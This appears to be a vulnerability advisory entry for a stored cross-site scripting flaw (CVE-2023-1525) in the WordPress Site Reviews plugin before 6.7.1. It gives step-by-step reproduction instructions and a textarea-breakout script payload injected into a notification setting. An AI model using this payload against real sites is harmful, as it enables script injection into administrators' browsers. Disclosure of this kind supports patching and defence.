Lucene search
Shreya PohekarWPEX-ID:4AE6BF90-B100-4BB5-BDD7-8ACDBD950596HistoryApr 05, 2023 - 12:00 a.m.
Site Reviews < 6.7.1 - Admin+ Stored XSS
2023-04-0500:00:00
Shreya Pohekar
59
stored xss
admin login
intercept request
parameter manipulation
security exploit
vulnerable form
0.001 Low
EPSS
Percentile
23.7%
The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
1. Login as Admin.
2. Go to http://vulnerable-site.tld/wp-admin/edit.php?post_type=site-review&page=glsr-settings&tab=general
3. Make some changes in the `schema` tab and intercept the request.
4. The form will have the parameter `site_reviews_v6[settings][general][notification_message]`
5. Insert the following payload in it
```
<strong>A new {review_rating}-star review has been submitted:</strong>
</textarea><script>alert(1)</script>
{review_title}
{review_content}
{review_author} <{review_email}> - {review_ip}
{review_link}
```
6. Hit send and the xss payload will be saved and will be triggered whenever the settings page is open.Related
prion
prion
Cross site scripting
2023-05-02 08:15:00
cvelist
cvelist
CVE-2023-1525 Site Reviews < 6.7.1 - Admin+ Stored XSS
2023-05-02 07:04:49
cve
cve
CVE-2023-1525
2023-05-02 08:15:09
nvd
nvd
CVE-2023-1525
2023-05-02 08:15:09
wpvulndb
wpvulndb
Site Reviews < 6.7.1 - Admin+ Stored XSS
2023-04-05 00:00:00
wordfence
wordfence